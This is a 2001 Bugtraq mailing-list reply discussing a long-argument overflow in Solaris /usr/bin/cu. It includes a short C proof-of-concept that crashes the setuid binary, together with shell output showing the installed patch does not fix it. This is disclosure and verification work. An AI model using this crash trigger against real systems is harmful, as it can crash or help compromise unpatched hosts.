[18862] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (Dan Harkless)
Tue Jan 30 13:20:40 2001
Message-Id: <200101300421.UAA17184@dilvish.speed.net>
Date: Mon, 29 Jan 2001 20:21:39 -0800
Reply-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
From: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from hal King <hck@UTK.EDU> of "Tue, 23 Jan 2001 12:00:11
EST." <20010123120011.E2883@thag.utk.edu>
hal King <hck@UTK.EDU> writes:
> In Solaris 2.6 patch 106468-02 replaces cu in Sol 7 patch 108372-01 replaces
> it for gets() use. The script does SegFault in 8, but no core file... I am
> running 10/2000 revision and 108372 came out in may, so it's probably cool.
Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:
# cat > cu_exploit.c
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
# uname -a
SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
# showrev -p | fgrep 106468-02
Patch: 106468-02 Obsoletes: Requires: Incompatibles: Packages: SUNWbnuu
# pkgchk -p /usr/bin/cu
ERROR: /usr/bin/cu
permissions <4111> expected <0111> actual
106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq@dilvish.speed.net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
